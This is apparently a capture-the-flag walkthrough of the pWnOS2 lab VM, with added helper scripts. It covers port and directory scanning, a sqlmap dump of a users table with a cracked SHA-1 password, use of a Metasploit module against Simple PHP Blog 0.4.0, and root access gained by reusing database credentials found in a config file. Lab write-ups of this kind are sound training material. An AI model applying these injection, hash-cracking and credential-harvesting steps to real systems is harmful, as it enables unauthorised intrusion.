pWnOS2
This VM has a static IP of 10.10.10.100 by default, so VM NAT mode will not work. Put both Kali and the target on host-only networking and, in the Virtual Network Editor, set the host-only subnet to 10.10.10.0. After restarting the VMs the target is reachable and can be scanned.
Kali IP: 10.10.10.128
Target IP: 10.10.10.100
Then, as usual, start with information gathering.
Start with a quick full-port sweep to get the lay of the land (--min-rate 10000 tells nmap to send at least 10,000 packets per second, so this is the fast coarse pass, not a slow one):
sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:00 CST
Nmap scan report for 10.10.10.100
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Next, run TCP service/OS detection and a UDP probe against the two ports found:
sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:01 CST
Nmap scan report for 10.10.10.100
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:C3:40:F1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.75 seconds
sudo nmap -sU -p22,80 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-01 10:03 CST
Nmap scan report for 10.10.10.100
Host is up (0.00028s latency).
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:C3:40:F1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.22 seconds
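The scans above follow a two-phase pattern that is worth scripting: a fast full-range sweep, then version and OS probes only on the ports that came back open. The script below is an added example, not part of the original writeup. It parses nmap's grepable (-oG) output rather than the human-readable form, carries a constructed sample of that output so the parser can be tried without a target, and uses file names (sweep.gnmap, services.txt) of its own choosing. The trailing ",1" in the second scan assumes port 1 is closed, which gives -O the closed-port reference that the "OSScan results may be unreliable" warning above is complaining about.

```shell
#!/bin/sh
# Two-phase nmap workflow: fast sweep of all TCP ports, then targeted
# service/OS detection on the open ones only. Added example, not from the
# original writeup.

# Constructed sample of nmap -oG output, shaped like the sweep on the page
# (two open ports); lets the parser run without a live target.
SAMPLE_GNMAP='# Nmap 7.94 scan initiated as: nmap --min-rate 10000 -p- -oG sweep.gnmap 10.10.10.100
Host: 10.10.10.100 ()   Status: Up
Host: 10.10.10.100 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///    Ignored State: closed (65533)
# Nmap done -- 1 IP address (1 host up) scanned'

# Read -oG output on stdin, print the open TCP ports as "22,80" (nmap -p syntax).
open_ports() {
    grep -o '[0-9][0-9]*/open/tcp' | cut -d/ -f1 | sort -n -u | paste -s -d ',' -
}

# Number of open TCP ports in -oG output on stdin.
open_count() {
    open_ports | tr ',' '\n' | grep -c .
}

sweep_and_enumerate() {
    target="$1"
    # Phase 1: every TCP port, high packet rate, grepable output for parsing.
    sudo nmap --min-rate 10000 -p- -oG sweep.gnmap "$target" >/dev/null
    ports=$(open_ports < sweep.gnmap)
    if [ -z "$ports" ]; then
        echo "no open TCP ports on $target" >&2
        return 1
    fi
    echo "open ports: $ports"
    # Phase 2: -sT full connect, -sV banners, -O fingerprint. Port 1 is
    # assumed closed; scanning it too gives -O the closed-port reference
    # it needs, so the "could not find at least 1 open and 1 closed port"
    # warning goes away.
    sudo nmap -sT -sV -O -p "$ports,1" -oN services.txt "$target"
}

# Run against a real target only when one is given: ./recon.sh 10.10.10.100
if [ "$#" -ge 1 ]; then
    sweep_and_enumerate "$1"
fi
```

Without arguments the script only defines the functions, so the parser can be exercised on the sample with `printf '%s\n' "$SAMPLE_GNMAP" | open_ports`.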
So the way in is almost certainly the web service. Open it in a browser.
Then brute-force directories (note how many of them dirb reports as listable):
sudo dirb http://10.10.10.100
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 1 10:16:41 2023
URL_BASE: http://10.10.10.100/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.100/ ----
+ http://10.10.10.100/activate (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/
+ http://10.10.10.100/cgi-bin/ (CODE:403|SIZE:288)
==> DIRECTORY: http://10.10.10.100/includes/
+ http://10.10.10.100/index (CODE:200|SIZE:854)
+ http://10.10.10.100/index.php (CODE:200|SIZE:854)
+ http://10.10.10.100/info (CODE:200|SIZE:50175)
+ http://10.10.10.100/info.php (CODE:200|SIZE:50044)
+ http://10.10.10.100/login (CODE:200|SIZE:1174)
+ http://10.10.10.100/register (CODE:200|SIZE:1562)
+ http://10.10.10.100/server-status (CODE:403|SIZE:293)
---- Entering directory: http://10.10.10.100/blog/ ----
+ http://10.10.10.100/blog/add (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/atom (CODE:200|SIZE:1062)
+ http://10.10.10.100/blog/categories (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/comments (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/config/
+ http://10.10.10.100/blog/contact (CODE:200|SIZE:6011)
==> DIRECTORY: http://10.10.10.100/blog/content/
+ http://10.10.10.100/blog/delete (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/docs/
==> DIRECTORY: http://10.10.10.100/blog/flash/
==> DIRECTORY: http://10.10.10.100/blog/images/
+ http://10.10.10.100/blog/index (CODE:200|SIZE:8093)
+ http://10.10.10.100/blog/index.php (CODE:200|SIZE:8094)
+ http://10.10.10.100/blog/info (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/info.php (CODE:302|SIZE:0)
==> DIRECTORY: http://10.10.10.100/blog/interface/
==> DIRECTORY: http://10.10.10.100/blog/languages/
+ http://10.10.10.100/blog/login (CODE:200|SIZE:5760)
+ http://10.10.10.100/blog/logout (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/options (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/rdf (CODE:200|SIZE:1411)
+ http://10.10.10.100/blog/rss (CODE:200|SIZE:1237)
==> DIRECTORY: http://10.10.10.100/blog/scripts/
+ http://10.10.10.100/blog/search (CODE:200|SIZE:5044)
+ http://10.10.10.100/blog/setup (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/static (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/stats (CODE:200|SIZE:5402)
==> DIRECTORY: http://10.10.10.100/blog/themes/
+ http://10.10.10.100/blog/trackback (CODE:302|SIZE:0)
+ http://10.10.10.100/blog/upgrade (CODE:302|SIZE:0)
---- Entering directory: http://10.10.10.100/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/flash/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/interface/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/languages/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://10.10.10.100/blog/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Sep 1 10:16:49 2023
DOWNLOADED: 9224 - FOUND: 30
Check whether a CMS is in use:
sudo whatweb -v 10.10.10.100
WhatWeb report for http://10.10.10.100
Status : 200 OK
Title : Welcome to this Site!
IP : 10.10.10.100
Country : RESERVED, ZZ
Summary : Apache[2.2.17], Cookies[PHPSESSID], Email[admin@isints.com], HTTPServer[Ubuntu Linux][Apache/2.2.17 (Ubuntu)], PHP[5.3.5-1ubuntu7], X-Powered-By[PHP/5.3.5-1ubuntu7]
The site hosts a blog, and its HTML source carries a generator tag that does not show on the rendered page:
<meta name="generator" content="Simple PHP Blog 0.4.0">
The web app has brute-force and injection surfaces; leave those tests running in the background and meanwhile look up details on this blog software.
sqlmap dumped the account and password. Note to self: put the POST request file in the sqlmap directory next time; typing out file paths is a pain...
sqlmap -r "/home/**/桌面/1.txt" -p n --dbs
sqlmap -r "/home/**/桌面/1.txt" -D ch16 --tables
sqlmap -r "/home/**/桌面/1.txt" -D ch16 -T users --dump
Database: ch16
Table: users
[1 entry]
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
| user_id | pass | email | active | last_name | first_name | user_level | registration_date |
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
| 1 | c2c4b4e51d9e23c02c15702c136c3e950ba9a4af | admin@isints.com | NULL | Privett | Dan | 0 | 2011-05-07 17:27:01 |
+---------+------------------------------------------+------------------+----------+-----------+------------+------------+---------------------+
The hash is 40 hex characters, i.e. SHA-1 length rather than MD5 (32). An online lookup resolves it to pass: killerbeesareflying, but logging in with it shows nothing of interest.
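Identifying the algorithm by digest length before cracking, and doing the dictionary check offline instead of pasting the hash into a web lookup, can be scripted in a few lines. The script below is an added example, not part of the original writeup; the wordlist is a constructed stand-in for rockyou.txt, and the hashes in the tests are the well-known digests of "abc" and "hello", not values from the target.

```shell
#!/bin/sh
# Identify an unsalted hex digest by length and check candidates offline.
# Added example, not part of the original writeup.

# Best-guess algorithm for a hex digest, by length. Prints the name and
# returns 0, or prints a reason and returns 1.
classify_hash() {
    h=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    case "$h" in
        *[!0-9a-f]*) echo "not-hex"; return 1 ;;
    esac
    case "${#h}" in
        32) echo "md5" ;;
        40) echo "sha1" ;;
        64) echo "sha256" ;;
        *)  echo "unknown"; return 1 ;;
    esac
}

# Digest one word the way PHP's md5()/sha1() do: no trailing newline.
digest() {
    algo="$1"; word="$2"
    case "$algo" in
        md5)    cmd=md5sum ;;
        sha1)   cmd=sha1sum ;;
        sha256) cmd=sha256sum ;;
        *) echo "unsupported algorithm: $algo" >&2; return 1 ;;
    esac
    printf '%s' "$word" | "$cmd" | cut -d' ' -f1
}

# Dictionary check: candidates on stdin, one per line. Prints the first
# word whose digest equals the target and returns 0; returns 1 otherwise.
crack() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    algo=$(classify_hash "$target") || return 1
    while IFS= read -r word; do
        if [ "$(digest "$algo" "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done
    return 1
}

# Constructed mini wordlist; a real run would pipe in rockyou.txt or similar.
SAMPLE_WORDLIST='password
letmein
abc
killerbeesareflying'

# Usage: ./crack.sh <hex digest> [wordlist]; with no wordlist the sample is used.
if [ "$#" -ge 1 ]; then
    echo "algorithm: $(classify_hash "$1")"
    if [ "$#" -ge 2 ]; then
        crack "$1" < "$2"
    else
        printf '%s\n' "$SAMPLE_WORDLIST" | crack "$1"
    fi
fi
```

Running it against the 40-character hash from the dump with the sample wordlist reproduces the check the online lookup did, and the same functions work for the 32-character MD5 case the writeup originally assumed.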
searchsploit shows Metasploit has an exploit for this blog version, so try that:
searchsploit Simple PHP Blog 0.4.0
----------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulnerabilities | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote Exploits | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit) | php/webapps/16883.rb
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
After setting rhost and lhost, run the module and it hands back a shell. Upgrade it to an interactive one with a pseudo-terminal:
python -c "import pty;pty.spawn('/bin/bash')"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
Now look through the directories that might hold configuration files, chiefly /var and the web root.
Trying the credentials from each file in turn, the ones in /var/mysqli_connect.php are the right ones: they also work for root over SSH, so privilege escalation is done.
ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)
* Documentation: http://www.ubuntu.com/server/doc
System information as of Fri Jul 7 10:06:52 EDT 2023
System load: 0.0 Processes: 86
Usage of /: 2.9% of 38.64GB Users logged in: 0
Memory usage: 23% IP address for eth0: 10.10.10.100
Swap usage: 0%
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May 9 19:29:03 2011
root@web:~# whoami
root
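The config-file hunt that led to the root login is a routine step after landing a www-data shell, and it is easy to script: find the PHP files that open a database connection, pull the DB_* constants out of them, and try the user:password pair elsewhere (ssh, su, mysql). The script below is an added example, not part of the original writeup. The sample config is constructed in the style of a mysqli_connect.php with placeholder values; it is not the target's real file or credentials.

```shell
#!/bin/sh
# Find database credentials in web configs from a low-privilege shell and
# pull them out for credential-reuse checks. Added example, not part of the
# original writeup.

# Constructed sample config (quoted heredoc, so nothing is expanded);
# placeholder values, not the target's real credentials.
SAMPLE_CONFIG=$(cat <<'EOF'
<?php
// Database connection settings (constructed sample, placeholder values)
DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 's3cret-placeholder');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'ch16');
$dbc = @mysqli_connect (DB_HOST, DB_USER, DB_PASSWORD, DB_NAME) OR die ('Could not connect to MySQL: ' . mysqli_connect_error());
?>
EOF
)

# List files under the given directories that open a database connection.
# Errors are silenced because an unprivileged user cannot read everything.
find_db_configs() {
    grep -rliE 'mysqli?_connect|DB_PASSWORD|new PDO' "$@" 2>/dev/null
}

# Read PHP on stdin; print NAME=VALUE for each define('DB_*', 'value'),
# tolerating DEFINE/define, extra spaces, and single or double quotes.
extract_db_defines() {
    sed -n -E "s/^[[:space:]]*[Dd][Ee][Ff][Ii][Nn][Ee][[:space:]]*\([[:space:]]*['\"](DB_[A-Z_]+)['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1=\2/p"
}

# Reduce the defines to a user:password pair to try elsewhere (ssh, su,
# mysql). Splits on the first '=' only so passwords containing '=' survive;
# prints nothing unless both user and password were found.
reuse_pair() {
    extract_db_defines | awk '{
        i = index($0, "="); k = substr($0, 1, i - 1); v = substr($0, i + 1)
        if (k == "DB_USER") u = v; if (k == "DB_PASSWORD") p = v
    } END { if (u != "" && p != "") print u ":" p }'
}

# Usage on a target: ./dbcreds.sh /var /var/www
if [ "$#" -ge 1 ]; then
    find_db_configs "$@" | while IFS= read -r f; do
        echo "== $f"
        reuse_pair < "$f"
    done
fi
```

On the target the interesting output is the user:password line for each file; the writeup's root SSH login is exactly that pair from /var/mysqli_connect.php reused against a different service.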